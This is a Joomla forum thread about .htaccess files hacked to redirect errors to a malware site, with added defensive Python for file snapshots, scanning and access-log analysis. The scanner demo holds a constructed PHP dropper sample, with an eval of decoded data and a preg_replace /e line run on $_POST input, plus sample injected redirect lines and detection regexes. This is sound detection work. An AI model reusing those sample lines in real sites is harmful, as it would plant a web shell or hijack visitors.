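mandville's suggestion is to timestamp when the code gets inserted so the host's logs can be searched around that moment. As an added example, not the checklist's cron commands and not Joomla code, here is the same idea as a snapshot-and-compare script: hash every file, diff two snapshots to list what appeared or changed, and use ctime to spot files whose mtime has been backdated the way PhilD describes. The directory layout and the simulated intrusion inside demo() are constructed; in practice you would run build_manifest() from cron, keep each snapshot outside the web root, and diff the newest two.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path
from typing import Dict, List, Tuple

# relative path -> (sha256 hex, mtime, ctime). Unix ctime semantics assumed (the hosts in this
# thread are Linux); on Windows st_ctime is the creation time and the heuristic does not apply.
Manifest = Dict[str, Tuple[str, float, float]]


def build_manifest(root) -> Manifest:
    """Hash every regular file under root and record its mtime and ctime."""
    root = Path(root)
    manifest: Manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            st = path.stat()
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = (digest, st.st_mtime, st.st_ctime)
    return manifest


def newest_ctime(manifest: Manifest) -> float:
    """The newest ctime in a snapshot, used as the 'since' reference for a later comparison."""
    return max((ctime for _, _, ctime in manifest.values()), default=0.0)


def diff_manifests(before: Manifest, after: Manifest) -> Dict[str, List[str]]:
    """Files that appeared, vanished or changed content between two snapshots."""
    common = set(before) & set(after)
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in common if before[p][0] != after[p][0]),
    }


def forged_mtime_candidates(manifest: Manifest, since: float, slack: float = 60.0) -> List[str]:
    """Files whose inode changed at or after `since` while their mtime claims to be older.

    utime() lets an intruder rewrite mtime (the trick PhilD describes), but the kernel sets
    ctime on every inode change and offers no call to backdate it, so a fresh ctime paired
    with an old mtime is a file worth opening. Heuristic, not proof: a chown or chmod also
    bumps ctime without touching mtime."""
    return sorted(p for p, (_, mtime, ctime) in manifest.items()
                  if ctime >= since and mtime < ctime - slack)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a tiny site, then simulate an intrusion that drops a
    file and edits index.php while backdating its mtime; report what the comparison catches."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "images").mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "images" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 fake jpeg header")
        baseline = build_manifest(root)
        since = newest_ctime(baseline)

        # Simulated intrusion (touches only files inside the temp dir).
        (root / "images" / "dropped.php").write_text("<?php /* dropped file */ ?>\n")
        with (root / "index.php").open("a") as fh:
            fh.write("<?php /* injected */ ?>\n")
        thirty_days_ago = time.time() - 30 * 86400
        os.utime(root / "index.php", (thirty_days_ago, thirty_days_ago))  # backdate mtime only

        current = build_manifest(root)
        report = diff_manifests(baseline, current)
        report["forged_mtime"] = forged_mtime_candidates(current, since=since)
        return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

The content hashes, not the timestamps, are what prove a file changed; the ctime check only orders the candidates so that the ones with a faked mtime are read first, and the ctime of the added or modified file is the value to hand to the host when asking for access logs from that window.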
- jimbrooking
- Joomla! Enthusiast
- Posts: 104
- Joined: Thu Mar 17, 2011 12:38 am
Site Hacked - 404 errors hijacked
My site (http://www.fearringtonfha .org) was compromised on or about March 30. On Sunday, April 1 I found that all the .htaccess files on my Joomla 2.5 site (upgraded from 1.7 on March 18) had been modified to send traffic to a Russian malware site in case of any page error (401, 402, 403, 404, 500). I repaired all the .htaccess files. However 404 errors were still being redirected to the same Russian site.
This morning I changed my .htaccess file to handle 404 errors with a page within my Joomla site. This appears to work as expected, and 404 errors now go correctly to the page I specify in the .htaccess file.
Apparently some code within Joomla handles 404 errors (i.e., prior to my latest change to .htaccess), and apparently this code has somehow been compromised. Can anyone give me an idea of where to look for the bad code?
Thanks.
Last edited by mandville on Tue Apr 03, 2012 11:39 am, edited 2 times in total.
Reason: Moved the topic from the forum Administration to Security
-
- Joomla! Explorer
- Posts: 359
- Joined: Thu Jun 14, 2007 2:48 pm
- Location: Coppell, Texas
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I think I have my site fixed.
After replacing the compromised .htaccess file in the root & deleting the .htaccess files in all the Joomla core sub directories, the .htaccess files were being regenerated. There is code inserted into the beginning of the core .htaccess that is in the root directory & also a little way below the bottom of the same .htaccess file.
After looking in the files carefully, and following some hints I found in these forums & other posts on the internet, I found a file called "_cache_iccizijj.php" in the tmp sub directory. It has comments at the beginning of the file about vBulletin 3.1.9 including vBulletin copyright notice. It has a lot of very long strings of code that look like random key strokes but I suspect this file is generating the .htaccess files.
I renamed the _cache_iccizijj.php file & deleted the malicious code in the root .htaccess file & deleted all the other .htaccess files in the Joomla core sub directories and my site has been trouble free now for several hours.
My site was Joomla 1.5.25; I upgraded it to 1.5.26. I changed the Super Admin & Admin user passwords.
It appears to be fixed now. I can type in an incorrect site url & I get the correct 404 page. I will post back here if the problem reoccurs. I am about to delete the renamed _cache_iccizijj.php file.
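The two artifacts described in the post above (redirect lines re-injected into .htaccess files, and an obfuscated "_cache_*.php" dropper sitting in tmp/) can be swept for mechanically rather than by eye. The following is an example added to this thread, not code from any post or from Joomla itself; it also checks one level above the web root, where a later post reports a copy of the hacked .htaccess being placed. The sample .htaccess and dropper bodies, the directory layout and the "xx.ru" host are all constructed for the demonstration.

```python
"""Sweep a Joomla install for redirect/ErrorDocument lines injected into
.htaccess files (including a copy above the web root) and for obfuscated
PHP dropped into tmp/ or cache/. Added example, not Joomla's own code."""
import os
import re
import tempfile
import time
from pathlib import Path

# Directives that send a visitor to an absolute URL: off-site rewrites,
# ErrorDocument pointing at a URL (answers 302 where a 404 belongs, the
# symptom in this thread) and plain Redirect/RedirectMatch to another host.
HTACCESS_SUSPECT = re.compile(
    r"^\s*(?:RewriteRule\s+\S+\s+https?://\S+"
    r"|ErrorDocument\s+\d{3}\s+https?://\S+"
    r"|Redirect(?:Match|Permanent|Temp)?\s+(?:\d{3}\s+)?\S+\s+https?://\S+)",
    re.IGNORECASE | re.MULTILINE,
)

# Obfuscation idioms typical of droppers and web shells: eval of a decoded
# or inflated string, preg_replace with the /e modifier (which executes the
# replacement), and a request parameter used as a function name.
PHP_SUSPECT = re.compile(
    r"(?:eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\("
    r"|preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"
    r"|\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\()",
    re.IGNORECASE,
)

# Joomla keeps no PHP in these folders, so any .php there is a finding
# before its contents are even examined.
NO_PHP_DIRS = {"tmp", "cache"}


def scan_htaccess(text):
    """Return the suspicious directive lines in an .htaccess body."""
    return [m.group(0).strip() for m in HTACCESS_SUSPECT.finditer(text)]


def scan_php(text):
    """Return the obfuscation idioms found in a PHP source body."""
    return [m.group(0) for m in PHP_SUSPECT.finditer(text)]


def _finding(kind, path, hits):
    # Report ctime beside mtime: an attacker can reset mtime with touch(),
    # but ctime changes on every write and cannot be set from userland.
    st = path.stat()
    fmt = "%Y-%m-%d %H:%M:%S"
    return {"kind": kind, "path": str(path), "hits": hits,
            "mtime": time.strftime(fmt, time.localtime(st.st_mtime)),
            "ctime": time.strftime(fmt, time.localtime(st.st_ctime))}


def sweep(webroot, parent_levels=1):
    """Walk the web root and return a list of findings. Also looks at the
    .htaccess directly inside parent_levels directories above the root."""
    webroot = Path(webroot).resolve()
    findings = []
    for parent in list(webroot.parents)[:parent_levels]:
        ht = parent / ".htaccess"
        if ht.is_file():
            hits = scan_htaccess(ht.read_text(errors="replace"))
            findings.append(_finding("htaccess-above-root", ht, hits))
    for dirpath, _dirs, files in os.walk(webroot):
        rel = Path(dirpath).relative_to(webroot)
        top = rel.parts[0] if rel.parts else ""
        for name in files:
            path = Path(dirpath) / name
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            if name == ".htaccess":
                hits = scan_htaccess(text)
                if hits:
                    findings.append(_finding("htaccess-redirect", path, hits))
            elif path.suffix.lower() in (".php", ".php5", ".phtml"):
                hits = scan_php(text)
                if top in NO_PHP_DIRS:
                    findings.append(_finding("php-in-tmp", path, hits))
                elif hits:
                    findings.append(_finding("php-obfuscated", path, hits))
    return findings


# Constructed sample: Joomla-style rules with two injected lines.
SAMPLE_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule ^(.*)$ http://xx.ru/in.php?q=$1 [R=301,L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
ErrorDocument 404 http://xx.ru/404.php
"""

# Constructed sample modelled on the tmp/_cache_*.php droppers reported above.
SAMPLE_DROPPER = r"""<?php
$code = "ZmFrZSBwYXlsb2Fk";
@eval(gzinflate(base64_decode($code)));
preg_replace("/.*/e", $_POST["c"], "");
"""


def demo():
    """Build a throwaway tree with the constructed samples and sweep it."""
    base = Path(tempfile.mkdtemp())
    web = base / "public_html"
    (web / "tmp").mkdir(parents=True)
    (web / "components").mkdir()
    (web / ".htaccess").write_text(SAMPLE_HTACCESS)
    (web / "tmp" / "_cache_abcdefgh.php").write_text(SAMPLE_DROPPER)
    (web / "components" / "clean.php").write_text("<?php echo 'ok';\n")
    # The copy above the web root that an FTP user never sees.
    (base / ".htaccess").write_text("ErrorDocument 404 http://xx.ru/\n")
    return sweep(web)


if __name__ == "__main__":
    for f in demo():
        print(f["kind"], f["path"], "mtime", f["mtime"], "ctime", f["ctime"])
        for h in f["hits"]:
            print("    ", h)
```

Run it with `sweep("/path/to/public_html")` on a copy of the site taken over FTP or SSH. A clean result from this scan is not proof of a clean site: it only catches the idioms listed, and the posts below explain why deleting the files it finds is not the same as removing the intruder.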
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
As previously stated many times by several people, deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file on the server.
Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
yaanimai - thanks for your post! I think I have fixed my site also. I too found a similar file to the one you mentioned in the tmp subdirectory - mine called _cache_ldxmbzqi.php. Again it had vBulletin references and a load of what looks like encrypted code. I was happy to delete it as I have no vBulletin installs. After deleting this file and cleaning up three .htaccess files my site has been back to normal for a couple of hours, and without new code injected into the .htaccess files. Will monitor and report back.
Just need to know how it got there in the first place......
Cheers
Andy
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
Interestingly, from my logs there has been someone from IP address 188.190.127.71 trying to access the above file. Somewhere in Ukraine, a host called Infium.
Someone send the boys round.....
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
andysdp wrote: .... I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. ...
And we all know what thought did.
Unless you delete all the folders/files on the server then you are still infected. It is not just the .htaccess that is being infected with the redirect code. Images and legitimate files are also being infected.
Once access is gained to your server then various files are loaded onto your server.
What is your url ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
http://www.1stlinslade. org.uk this is the older 1.5.23 site which is live to our members. The updated 2.5.4 site is sitting in http://www.1stlinslade. org.uk/jupgrade until I have completed all my changes.
Webdongle - I bow to your greater knowledge and will take on board any further advice. In simple terms, what do you suggest I do next? Wiping and starting again sounds like an unenviable task! Especially after spending time adjusting the JA-Purity template, which was core in 1.5 and now not core in 2.5! As I have said earlier, I have been running Joomla for many years, and this is a hobby done in spare time for my Scout Group - I'm not a programmer! Is there any easy to follow guide for deleting folders/files while keeping all content intact - has the database been infected? How can I assess the extent of the infection?
Many thanks for your help
Andy
Last edited by mandville on Tue Apr 03, 2012 5:36 pm, edited 1 time in total.
Reason: broke link
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
@andysdp
Told you so; scanned a few minutes ago. Now will you please stop saying it's fixed by deleting just a few files? That sort of comment only allows others to falsely think their sites are safe by doing the same.
Again I say
As previously stated many times by several people, deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file on the server.
Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 6
- Joined: Tue Feb 17, 2009 11:15 am
Re: htaccess hacked, re-directing traffic to xx.ru
@webdongle
Thanks for your reply. I missed a couple of .htaccess files! Thanks for info on the scanning site - just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now, which is a relief - see screenshots.
Thanks Andy
- kurchania
- Joomla! Hero
- Posts: 2070
- Joined: Mon Sep 21, 2009 6:56 am
- Location: indore,india
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
@andysdp
The site is hacked using the wso2.5 web shell script, which replaces all the .htaccess files of the root folder. This script can give access to all files.
If you are affected, please review the .htaccess of the subdomain and of every folder which contains a .htaccess.
Please review the tmp folder. You can find the cache_ file there, with preg_replace again.
Remember the date on which this script was uploaded to the server.
If this is shared hosting, please consult your hosting provider, because one domain can affect all the subdomains; meaning a file present in any other domain on the shared hosting can access your code also.
Also, better search the log file for when this file was inserted on the server. Ask your hosting provider to restore the backup from before this date and then update everything.
Regards
Abhijeet
abhijeet kurchania
The future depends on what you do today
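Two posts above point at the access log as the place to date the intrusion: andysdp saw 188.190.127.71 requesting his dropped file, and kurchania advises finding when the file was inserted and restoring a backup from before that date. Log evidence matters here because, as the thread notes, the attacker can reset file mtimes. The following is an example added to this thread, not code from any post; the log lines are constructed in Apache's combined format around the IP address and file name andysdp reported, and the other addresses and request paths in them are invented for illustration, not taken from any real log.

```python
"""Date a web-shell drop from the raw access log rather than from file
timestamps. Given the dropped file's name: first request for it (the file
existed on disk no later than that), every client that called it, and what
the first client did beforehand. Added example; log lines are constructed."""
import re
from datetime import datetime

# Apache "combined" format: ip ident user [time] "req" status size "ref" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log. The IP and dropper name come from this thread;
# everything else is invented to give the functions something to work on.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2012:08:01:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
188.190.127.71 - - [02/Apr/2012:09:14:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 4870 "-" "Mozilla/4.0"
188.190.127.71 - - [02/Apr/2012:09:14:40 +0000] "POST /index.php HTTP/1.1" 200 312 "-" "Mozilla/4.0"
188.190.127.71 - - [02/Apr/2012:09:15:30 +0000] "GET /tmp/_cache_ldxmbzqi.php HTTP/1.1" 200 18 "-" "Mozilla/4.0"
10.0.0.9 - - [02/Apr/2012:10:02:11 +0000] "GET /tmp/_cache_ldxmbzqi.php?c=1 HTTP/1.1" 200 18 "-" "-"
10.0.0.5 - - [02/Apr/2012:10:30:00 +0000] "GET /no-such-page HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse(line):
    """Parse one combined-format line; None for lines that do not match."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def investigate(log_text, dropped_file):
    """Return the timeline around dropped_file, or None if it never appears."""
    records = [r for r in map(parse, log_text.splitlines()) if r]
    hits = [r for r in records
            if r["path"].split("?", 1)[0].endswith("/" + dropped_file)]
    if not hits:
        return None
    first = min(hits, key=lambda r: r["ts"])
    return {
        # Upper bound on the drop time: the file answered this request.
        "first_seen": first,
        # The upload or exploit that placed it is somewhere in this traffic.
        "earlier_from_same_ip": [r for r in records
                                 if r["ip"] == first["ip"] and r["ts"] < first["ts"]],
        # Every address that drove the shell; block and report all of them.
        "clients": sorted({r["ip"] for r in hits}),
        # With the hacked ErrorDocument in place, missing pages answer 302
        # instead of 404, so 302s are a cheap proxy for affected visitors.
        "redirects": [r for r in records if r["status"] == "302"],
    }


if __name__ == "__main__":
    result = investigate(SAMPLE_LOG, "_cache_ldxmbzqi.php")
    f = result["first_seen"]
    print("first request:", f["ts"].isoformat(), f["ip"], f["path"])
    print("clients:", ", ".join(result["clients"]))
    for r in result["earlier_from_same_ip"]:
        print("earlier from same ip:", r["ts"].isoformat(), r["method"], r["path"])
```

Feed it the raw access log from the hosting control panel (not the web statistics summary, which drops the request paths). Restore from a backup taken before `first_seen`, then look at the `earlier_from_same_ip` requests to identify which extension or login the attacker used so the same hole is closed before the site goes back up.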
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
andysdp wrote: I missed a couple of .htaccess files! Thanks for info on the scanning site -...
Or those files got infected after you looked at them before.
andysdp wrote: ... just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now,
Did the 1.5.23 site not throw out a warning of old software? That site is likely to be infected again!
Have you checked all the extensions are up to date and not on the VEL ?
Have you checked all computers with admin/ftp access and with how many anti malware/antivirus programs ?
To be sure perhaps run the Forum Post Assistant on both sites and post the results here ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- mandville
- Joomla! Master
- Posts: 15150
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: htaccess hacked, re-directing traffic to xx.ru
kurchania - thanks for showing up so late at the party; sorry you haven't had time to read the topic or the post you are answering, which clearly says his site is now fixed.
kurchania wrote: @andysdp the site is hacked using wso2.5
It is known by many names, some listed in this topic.
kurchania wrote: if you are affected please review the htaccess folder of the subdomain and folder which contain htacces.
As listed in http://forum.joomla.org/viewtopic.php?f=621&t=582854 and quoted many times in this topic, along with the rest of the info you provided.
Your attempt to be helpful by retelling the canteen gossip is unfortunately badly placed.
As we have mentioned before to "certain" people, please read the full topic, then post considerately and helpfully, and don't confuse.
Summary of this topic so far.
* affects all hosts and server configurations
* is not Joomla specific (vb/wp/drup/html sites all report issues)
Procedure to repair:
see the forum sticky Before you post : read and action this
concentrate on http://docs.joomla.org/Security_Checklist_7 with specific attention to http://docs.joomla.org/Security_Checkli ... ter_relief
and http://docs.joomla.org/Security_Checkli ... d_and_cron
suggestion: create a htaccess file in the tmp folder with the code from http://docs.joomla.org/Security_Checkli ... ermissions to attempt to hamper attacks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
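A .htaccess for the tmp/ folder of the kind mandville suggests above. This is an added example written for this thread, not the text of the Security Checklist page he links (that link is cut off above). It assumes Apache with AllowOverride permitting at least Limit and FileInfo for the site, and that nothing under tmp/ ever needs to be served to a browser. It stops a dropper in tmp/ from being called over the web, which is how the attacker keeps re-injecting the redirects, but it does not stop the file from being written there and is no substitute for the full clean-up Webdongle describes.

```apache
# public_html/tmp/.htaccess
# Joomla uses tmp/ only as scratch space for installs and updates; no
# browser request should ever reach anything inside it.

# Apache 2.4 syntax
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>

# Apache 2.2 syntax (the 2.4 server ignores this block, and vice versa)
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>

# Belt and braces: should the deny ever be lifted, PHP files here are
# still not handed to the PHP engine. Needs AllowOverride FileInfo;
# drop this line if the server starts answering 500 after the change.
RemoveHandler .php .php5 .phtml
```

Upload it with the same owner and permissions as the other .htaccess files, then request a file under /tmp/ from a browser: a 403 confirms the override is honoured. Re-check the file after every Joomla update, and remember that a web shell already on the server can simply delete it, which is why the thread keeps insisting on a full rebuild.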
- kurchania
- Joomla! Hero
- Posts: 2070
- Joined: Mon Sep 21, 2009 6:56 am
- Location: indore,india
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
@mandville,
I cleaned the files on the 19th of last month, and 2 days ago the site was infected with a big red screen, so I posted.
I apologise if it looks like canteen gossip that some shell script is running freely on shared server hosting with the privilege to affect all the domains/permissions/database/brutal attack.
abhijeet kurchania
The future depends on what you do today
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
kurchania wrote: ... I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post....
Looks like you have holes in your security that let them in. Or you never deleted all your files.
Please use the Forum Post Assistant and post the results here. Also the site in the form of www.site dot com
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
A very easy written article on the htaccess hacks can be found here: http://www.squidoo.com/htaccess-hacked
It relies on either a website with poor protection or the use of the FTP password. They normally obtain this from a Trojan virus on your system.
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Mar 11, 2012 7:27 pm
Re: htaccess hacked, re-directing traffic to xx.ru
- It seems to me it could be an automated attack, given the wide range of hosts affected in a very similar way, so if anyone has any details they will probably apply to others as well;
- Vulnerability used (previously unknown) was:
http://www.nonumber.nl/news/releases/28 ... extensions
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Mar 11, 2012 7:27 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Some more info about the GoDaddy issue (all files removed, but 404 Not Found still redirects to the attacker's site):
Apparently there is something above 'root directory'. It isn't accessible from FTP or FTP*File manager, but it is still there. Attack put .htaccess in there and ErrorDocument apache directives in there applied.
To check that I used the following php code placed into root:
Code:
<?php
// Print the .htaccess one level above the web root, which FTP cannot reach
readfile('../.htaccess');

and to remove:

Code:
<?php
// Delete it once its contents have been inspected
unlink('../.htaccess');
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: htaccess hacked, re-directing traffic to xx.ru
I have said that several times in several posts here. The hack PLACES A COPY of the hacked htaccess file with the redirects in it above publicly accessible directories. This file needs to be found and removed as htaccess files do not belong outside of a publicly accessible area. The hacking put it there and they can access this file by way of the additional files placed within the publicly accessible areas of your site. When I mention publicly accessible areas, I mean where normal site (Joomla) files are installed. This is usually public_html, but some hosts call this area www, htdocs, or something similar
PhilD
- Webdongle
- Joomla! Master
- Posts: 44021
- Joined: Sat Apr 05, 2008 9:58 pm
Re: htaccess hacked, re-directing traffic to xx.ru
Hi PhilD
With shared Hosting(as I'm sure you know) there are different ways the ftp folders are organised.
- On some packages FTP access is to the folder above public_html. Are you saying a .htaccess is being placed above that directory?
- Some shared hosting has the FTP inside public_html. Are you saying the .htaccess file is being placed in the folder above public_html even though FTP access is not allowed above it?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".